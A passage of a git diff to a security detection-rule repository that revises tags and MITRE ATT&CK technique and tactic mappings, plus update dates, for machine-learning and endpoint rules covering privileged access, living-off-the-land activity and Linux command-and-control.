"Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml index abd5652b01f..819783e4e86 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,29 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml index 51b64715dc1..7af93c7e7f8 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,34 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml index 6a80f4a7bd4..419a525d378 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -77,29 +77,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml index bf61284eae9..475bbf0e183 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -80,29 +80,40 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml index d287e6828b1..43ae8f19544 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -87,19 +87,13 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml index 581372213fe..f0865772d82 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,19 +89,8 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml index ece76dfc05e..d58878658ee 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -79,29 +79,35 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml index afb390d2236..bb3d1645ebc 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -81,41 +81,35 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml index f7407fd1638..4a71ea94c33 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,19 +89,13 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml index c3078e43d19..4bc54d76a48 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -79,24 +79,17 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml index 24db21c141b..49333d5a47a 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/19" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -90,16 +90,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml index abb8bb47e03..ee6dee10815 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -92,16 +92,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml index 513d1a8b875..640761874bc 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -82,26 +82,30 @@ The LotL Attack Detection integration detects living-off-the-land activity in Wi - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Living off the Land Attack Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Living off the Land Attack Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml index c9d776c0b19..3fbffb61ab0 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,21 +113,3 @@ not (process.parent.name : "opera.exe" and process.command_line: "*--type=render ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.004" -name = "Masquerade Task or Service" -reference = "https://attack.mitre.org/techniques/T1036/004/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml index 283a4020daf..45959ad908c 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,21 +117,3 @@ The detection leverages a machine learning model to identify potentially suspici - Escalate the incident to the security operations center (SOC) or relevant security team for further analysis and to determine if additional systems are affected.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.004" -name = "Masquerade Task or Service" -reference = "https://attack.mitre.org/techniques/T1036/004/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml index 22b4da6597d..eaeea2b1bae 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -91,16 +91,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml index 7b94ae3ca14..c23efcce91d 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -93,16 +93,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml index a5b82dcbbf8..0d020444c91 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -93,16 +93,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index 2bbc37b2ccd..d685f0e9f35 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/21" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,15 +90,19 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index cab972324d4..ce9bc194297 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -128,14 +128,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=3s @@ -156,6 +149,11 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -164,13 +162,15 @@ reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1048.003" +name = "Exfiltration Over Unencrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/003/" [rule.threat.tactic] id = "TA0010" diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml index 5356874e6a6..ec8b3e38082 100644 --- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml +++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,15 +97,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Use Case: 